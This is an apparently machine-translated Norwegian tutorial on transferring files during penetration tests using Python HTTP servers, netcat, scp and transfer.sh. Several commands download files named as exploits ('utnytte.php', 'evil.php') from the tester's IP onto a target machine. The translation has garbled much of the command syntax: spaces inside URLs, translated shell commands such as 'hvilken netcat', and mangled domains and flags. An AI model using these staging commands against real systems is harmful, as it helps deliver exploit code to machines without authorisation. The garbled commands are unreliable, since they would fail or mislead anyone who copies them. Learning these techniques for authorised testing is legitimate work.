Overføring av utnyttelse, python-skript og lastemoduler er ofte nødvendig under penetrasjonstestaktiviteter. Siden terminalen er verktøyet som brukes mest, er det viktig å forstå det grunnleggende om filoverføring.
En pennetester bør være godt utstyrt med forskjellige triks for å overføre filer fra en ekstern server også fra en katalog til en annen. I denne opplæringen skal vi diskutere forskjellige måter å overføre filer ved hjelp av kommandolinjen.
1. Python Server
Python er grunnpakken som er forhåndsinstallert i nesten alle Debian-baserte systemer. Gjør følgende for å overføre en fil fra en maskin til en annen;
Python2:
Bytt til katalogen der filen din du vil overføre, finnes. Start en enkel python-server. Skriv inn følgende kommando;
$ python -m SimpleHTTPServer 8080
Gå nå til maskinen der du vil overføre filen. Bruk følgende kommando for å laste ned filen;
$ wget http: // 192.168.43.177: 8080 / fil
Husk å erstatte IP, portnummer og filnavn.
Python3:
Alt skrevet i python2 vil nesten alltid bryte i python3. Så vi ser også på hvordan du overfører en fil ved hjelp av python3.
I tilfelle av python3, skriv inn følgende kommando for å starte en enkel python-server.
$ python3 -m http.server 8080
For å laste ned filen på målet, skriv inn følgende kommando;
$ wget http: // 192.168.43.177: 8080 / utnytte.php
2. Netcat
Netcat er et kraftig verktøy for å overføre filer fra hvilken som helst ekstern maskin til en lokal maskin. Det kan ikke alltid være installert. Du kan sjekke om den eksisterer eller ikke ved å skrive inn;
$ hvilken netcat
Alternativt ved å gå inn;$ som nc
Lag en netcat-server med følgende kommando;
$ nc -nlvp 8080 < evil.php
Gå nå til målmaskinen og skriv inn følgende for å laste ned filen;
$ nc -nv 192.168.43.177 8080> ondskap.php
Erstatte nc
med netcat
i kommandoene ovenfor hvis nc ikke fungerer eller ikke er riktig installert.
3. SCP
Secure Copy Protocol er et kraftig verktøy for overføring av filer. Det kommer godt med spesielt når du vil overføre kataloger. Den brukes også mest til filoverføring over ssh.
For overføring av fil via ssh, skriv inn følgende kommando på sendemaskinen;
$ scp -i ny.pem test.py ubuntu @ 18.220.68.229: / hjem / ubuntu
Hvor -i representerer den offentlige nøkkelen for ssh-pålogging, test.py er filen som skal overføres og / home / ubuntu er målkatalogen der vi vil lagre filen.
For å laste ned en fil fra den eksterne maskinen, skriv inn følgende kommando;
$ scp root @ 192.168.43.177: / ekstern_katalog / fil / lokal / katalog
4. Overføre.sh
Du kan bruke dette tredjepartsverktøyet til å overføre filer. Det kan være nyttig når du ikke har en maskin med offentlig IP, og du fortsatt må overføre filene. Følgende kommando laster opp filen til overføringen.sh servere;
$ curl --opplastingsfil ./fil.txt https: // overføring.sh / fil.tekst
For å laste ned filen, skriv inn følgende kommando;
$ curl https: // overføring.sh // fil.txt -o fil.tekst
Overføre.sh er fortsatt under utvikling og fungerer kanskje ikke alltid.
Konklusjon
Kommandolinjeverktøy gir oss muligheten til å overføre filer på forskjellige måter. De kan virke litt kompliserte, men det å få hånd om dem gir muligheten til å enkelt administrere filer, spesielt når et GUI-alternativ ikke er tilgjengelig.